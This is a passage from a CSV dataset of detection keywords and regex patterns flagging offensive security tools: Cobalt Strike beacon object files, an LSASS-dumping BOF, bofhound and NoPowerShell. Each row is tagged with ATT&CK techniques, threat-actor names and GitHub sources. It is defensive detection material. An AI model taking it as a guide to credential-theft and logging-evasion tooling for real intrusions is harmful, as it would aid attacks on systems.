T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens 
- Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","36121" "*BOF-ForeignLsass*",".{0,1000}BOF\-ForeignLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - 
Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","36122" "*bofhound --*",".{0,1000}bofhound\s\-\-.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36123" "*bofhound -i *",".{0,1000}bofhound\s\-i\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36124" "*bofhound -o *",".{0,1000}bofhound\s\-o\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36125" "*bofhound-main*",".{0,1000}bofhound\-main.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36126" 
"*BOF-IShellWindows-DCOM.*",".{0,1000}BOF\-IShellWindows\-DCOM\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","36127" "*BofLdapSignCheck*",".{0,1000}BofLdapSignCheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","36128" "*bofloader.bin*",".{0,1000}bofloader\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","N/A","10","10","193","28","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z","36129" "*BOFMask-main*",".{0,1000}BOFMask\-main.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","36130" "*bofnet*SeriousSam.*",".{0,1000}bofnet.{0,1000}SeriousSam\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","36131" "*BOFNET.Bofs*",".{0,1000}BOFNET\.Bofs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 
- T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36132" "*BOFNET.Bofs.Jobs*",".{0,1000}BOFNET\.Bofs\.Jobs.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36133" "*bofnet.cna*",".{0,1000}bofnet\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36134" "*bofnet.cna*",".{0,1000}bofnet\.cna.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36135" "*BOFNET.csproj*",".{0,1000}BOFNET\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - 
Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36136" "*BOFNET.dll*",".{0,1000}BOFNET\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36137" "*BOFNET.dll*",".{0,1000}BOFNET\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in 
C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36138" "*BOFNET.sln*",".{0,1000}BOFNET\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk 
- Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36139" "*bofnet_boo *.boo*",".{0,1000}bofnet_boo\s.{0,1000}\.boo.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36140" "*bofnet_execute *",".{0,1000}bofnet_execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36141" "*bofnet_execute *",".{0,1000}bofnet_execute\s.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing 
PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36142" "*bofnet_execute.*",".{0,1000}bofnet_execute\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 